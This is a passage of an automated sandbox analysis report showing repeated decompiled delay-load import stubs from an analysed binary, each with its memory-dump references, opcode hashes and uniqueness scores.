                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 80caa8d6b37e56fe8ed79157d669d214e5436d7c9c505b585d6e422e933a6549
                                                        • Instruction ID: d04eb7a099d884b788d76f5eb09cf653372ba41b8fbfcf02967be633f3c09e69
                                                        • Opcode Fuzzy Hash: 80caa8d6b37e56fe8ed79157d669d214e5436d7c9c505b585d6e422e933a6549
                                                        • Instruction Fuzzy Hash: 21B012AD26C5027C3104A1446D42DBB016CE4C0B107304D1AB602C10C0D4501C810231
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1DB7D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 58%
                                                        			E00A1DB7D() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00A1E221(_t3, _t4, _t8, _t9, _t10, 0xa3bdc4, 0xa6215c); // executed
				goto __eax;
			}








                                                        0x00a1db58
                                                        0x00a1db60
                                                        0x00a1db67

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DB60
                                                          • Part of subcall function 00A1E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1E29E
                                                          • Part of subcall function 00A1E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1E2AF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 76c20a0b989af1efcf929d79eed78e81109d37cb48167f4589edcf6f1c3b1584
                                                        • Instruction ID: 6d6e41e67fc9bd6605f441e05a4e2117528e9f03fe5d1b479c21f97c0adaba95
                                                        • Opcode Fuzzy Hash: 76c20a0b989af1efcf929d79eed78e81109d37cb48167f4589edcf6f1c3b1584
                                                        • Instruction Fuzzy Hash: BBB012E926C4027C3104A1446D02DB6016CC4C1B10730CD1ABA02D11C0D4501C860131
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1DB4E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 58%
                                                        			E00A1DB4E() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00A1E221(_t3, _t4, _t8, _t9, _t10, 0xa3bdc4, 0xa6216c); // executed
				goto __eax;
			}








                                                        0x00a1db58
                                                        0x00a1db60
                                                        0x00a1db67

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DB60
                                                          • Part of subcall function 00A1E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1E29E
                                                          • Part of subcall function 00A1E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1E2AF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 9c5b41728745b95051ec8c981880aa0686a849872dd4bea5c74ca0e9d0b9692a
                                                        • Instruction ID: 7eb062be20687d54f7157199aeae842fab6687ee18655a34fb5cf2fac2294fe6
                                                        • Opcode Fuzzy Hash: 9c5b41728745b95051ec8c981880aa0686a849872dd4bea5c74ca0e9d0b9692a
                                                        • Instruction Fuzzy Hash: D1B012AD2AC5027C350461406D4ACBB022CC4C1B117308D1ABB02D00C0D4501C850031
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1E4C1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 58%
                                                        			E00A1E4C1() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00A1E221(_t3, _t4, _t8, _t9, _t10, 0xa3bea4, 0xa62034); // executed
				goto __eax;
			}








                                                        0x00a1e4cb
                                                        0x00a1e4d3
                                                        0x00a1e4da

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00A1E4D3
                                                          • Part of subcall function 00A1E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1E29E
                                                          • Part of subcall function 00A1E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1E2AF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 5284e23fe47c72de022b3e46e3fd1eb6a8dabab0cbe8f1c70737e319fb5ecfff
                                                        • Instruction ID: 3a9b168a36a667702a20732e1f1507fcc3c774ab42a7958a3d05d9c19fc526db
                                                        • Opcode Fuzzy Hash: 5284e23fe47c72de022b3e46e3fd1eb6a8dabab0cbe8f1c70737e319fb5ecfff
                                                        • Instruction Fuzzy Hash: BEB0129626A003BC3308D1542F12CF6023CC4C0B90730CC1ABA01D504095421C821032
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1DC31 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 58%
                                                        			E00A1DC31() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00A1E221(_t3, _t4, _t8, _t9, _t10, 0xa3bdc4, 0xa62114); // executed
				goto __eax;
			}








                                                        0x00a1db58
                                                        0x00a1db60
                                                        0x00a1db67

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DB60
                                                          • Part of subcall function 00A1E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1E29E
                                                          • Part of subcall function 00A1E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1E2AF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 768c7d7d3a4946c05431f87349efa28548a1026a8bb2072ff059d425f8d8e202
                                                        • Instruction ID: 787c44dfc3e000981d3d7fc50f400a347afb07927c7e3057dc5f411a608308da
                                                        • Opcode Fuzzy Hash: 768c7d7d3a4946c05431f87349efa28548a1026a8bb2072ff059d425f8d8e202
                                                        • Instruction Fuzzy Hash: ADB012A926C4027C3108A144AE07DB6016CC4C0F107304D2AB502C10C0D4601C820131
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1DDA0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 58%
                                                        			E00A1DDA0() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00A1E221(_t3, _t4, _t8, _t9, _t10, 0xa3bde4, 0xa62050); // executed
				goto __eax;
			}








                                                        0x00a1dd71
                                                        0x00a1dd79
                                                        0x00a1dd80

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DD79
                                                          • Part of subcall function 00A1E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1E29E
                                                          • Part of subcall function 00A1E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1E2AF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 3586a29210ee36359d2c5cde1ffb7c87c200e9c886050d7fa39362eed0c392d6
                                                        • Instruction ID: 66a43302ecf62722e026a2afe4b15ab91d0fc7b99a909a9dd5813951140609e1
                                                        • Opcode Fuzzy Hash: 3586a29210ee36359d2c5cde1ffb7c87c200e9c886050d7fa39362eed0c392d6
                                                        • Instruction Fuzzy Hash: 9CB012D926D4027C3104A1557E02EBE017ED0C4B147309E1BB600D0040D4501C860131
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1DD96 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 58%
                                                        			E00A1DD96() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00A1E221(_t3, _t4, _t8, _t9, _t10, 0xa3bde4, 0xa6204c); // executed
				goto __eax;
			}








                                                        0x00a1dd71
                                                        0x00a1dd79
                                                        0x00a1dd80

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DD79
                                                          • Part of subcall function 00A1E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1E29E
                                                          • Part of subcall function 00A1E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1E2AF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 4230ffc49b91c8e32c6503e8c2a8d8073a0591023dcf12d31d7192dcddc01bb5
                                                        • Instruction ID: 3ccf30becad15c4e845f4e3e108f7859f285d7eee7d9bd43821a9ed5e0634506
                                                        • Opcode Fuzzy Hash: 4230ffc49b91c8e32c6503e8c2a8d8073a0591023dcf12d31d7192dcddc01bb5
                                                        • Instruction Fuzzy Hash: 2FB012E9269402FC3104A1557D02DBA016DC0C0B10730DA1BB800C00C0D4541C850131
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1DDC8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 58%
                                                        			E00A1DDC8() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00A1E221(_t3, _t4, _t8, _t9, _t10, 0xa3bde4, 0xa62060); // executed
				goto __eax;
			}








                                                        0x00a1dd71
                                                        0x00a1dd79
                                                        0x00a1dd80

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DD79
                                                          • Part of subcall function 00A1E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1E29E
                                                          • Part of subcall function 00A1E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1E2AF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 790b064adcf919b0715edb14605a495f16403f7dd2ebe6dd19a24ff27a465c69
                                                        • Instruction ID: b5970bc64c9ae40731a583eb80f6853bab3d75a00205c7a3855fbe45c890eedf
                                                        • Opcode Fuzzy Hash: 790b064adcf919b0715edb14605a495f16403f7dd2ebe6dd19a24ff27a465c69
                                                        • Instruction Fuzzy Hash: 10B012D92AD5027C3104A1557D42EBA016EE0C0B107305A2BB400C0040D4501C810231
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1DEA5 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 58%
                                                        			E00A1DEA5() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00A1E221(_t3, _t4, _t8, _t9, _t10, 0xa3be44, 0xa62090); // executed
				goto __eax;
			}








                                                        0x00a1de94
                                                        0x00a1de9c
                                                        0x00a1dea3

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DE9C
                                                          • Part of subcall function 00A1E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1E29E
                                                          • Part of subcall function 00A1E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1E2AF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 597b2ab4f4b6e703e36652f860765555335d50fb595fcba2a25cadb114a7ac50
                                                        • Instruction ID: f3aa2b992276a4847942d6cb60900346e7668139d0338b24e8417b1333153b2f
                                                        • Opcode Fuzzy Hash: 597b2ab4f4b6e703e36652f860765555335d50fb595fcba2a25cadb114a7ac50
                                                        • Instruction Fuzzy Hash: 34B012963AD0027C310891582D07EF6027ED0C0B11730582AB501C4080D9501C850131
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1DEAF Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 58%
                                                        			E00A1DEAF() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00A1E221(_t3, _t4, _t8, _t9, _t10, 0xa3be44, 0xa6208c); // executed
				goto __eax;
			}








                                                        0x00a1de94
                                                        0x00a1de9c
                                                        0x00a1dea3

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DE9C
                                                          • Part of subcall function 00A1E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1E29E
                                                          • Part of subcall function 00A1E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1E2AF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 44fa0a96687b7f2a718d4074c722937281f1b924e9c941810389b0ea9070e024
                                                        • Instruction ID: 20ffdfb6fc2fa7f6013c6999e8a4f574c23ee9ae791266104834308038ce2bbc
                                                        • Opcode Fuzzy Hash: 44fa0a96687b7f2a718d4074c722937281f1b924e9c941810389b0ea9070e024
                                                        • Instruction Fuzzy Hash: C3B01296369003BC350C91482D07DF7027DC0C0B11730891AB900C50C0D9501C850131
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1DE8A Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 58%
                                                        			E00A1DE8A() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00A1E221(_t3, _t4, _t8, _t9, _t10, 0xa3be44, 0xa62088); // executed
				goto __eax;
			}








                                                        0x00a1de94
                                                        0x00a1de9c
                                                        0x00a1dea3

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DE9C
                                                          • Part of subcall function 00A1E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1E29E
                                                          • Part of subcall function 00A1E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1E2AF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: 1aaffab0a0f8870c032bcd579179b1f7c4d698dc992d43be540a9354008859df
                                                        • Instruction ID: 6fb3445e7aef008c39d2ca8b810fe5d78a1d9e8059fde50de8c620de8ed94509
                                                        • Opcode Fuzzy Hash: 1aaffab0a0f8870c032bcd579179b1f7c4d698dc992d43be540a9354008859df
                                                        • Instruction Fuzzy Hash: 16B012963692037C360851442D07CF7023DC0C0B11730491AB500D4080D9541CC50031
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1DEEB Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 58%
                                                        			E00A1DEEB() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00A1E221(_t3, _t4, _t8, _t9, _t10, 0xa3be64, 0xa6217c); // executed
				goto __eax;
			}








                                                        0x00a1def5
                                                        0x00a1defd
                                                        0x00a1df04

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DEFD
                                                          • Part of subcall function 00A1E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1E29E
                                                          • Part of subcall function 00A1E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1E2AF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                        • String ID:
                                                        • API String ID: 1269201914-0
                                                        • Opcode ID: c3072f90eeb5185bcd6b2eb3f094938f4a007b3d40b801185f31e4e95f2e5a9a
                                                        • Instruction ID: 34b7b9315626f4e2e0cd0569f9f60a5693258782cc5f10eb18141b27c508e7ef
                                                        • Opcode Fuzzy Hash: c3072f90eeb5185bcd6b2eb3f094938f4a007b3d40b801185f31e4e95f2e5a9a
                                                        • Instruction Fuzzy Hash: 84B012B626C1037C71086144AD06DF7013CC0D1B117308A1ABA00D80C0A9403C810031
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1DEC3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 58%
                                                        			E00A1DEC3() {
				void* _t3;
				void* _t4;
				void* _t8;
				void* _t9;
				void* _t10;

				_push(_t4);
				E00A1E221(_t3, _t4, _t8, _t9, _t10, 0xa3be44, 0xa62084); // executed
				goto __eax;
			}








                                                        0x00a1de94
                                                        0x00a1de9c
                                                        0x00a1dea3

                                                        APIs
                                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00A1DE9C
                                                          • Part of subcall function 00A1E221: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A1E29E
                                                          • Part of subcall function 00A1E221: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A1E2AF
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
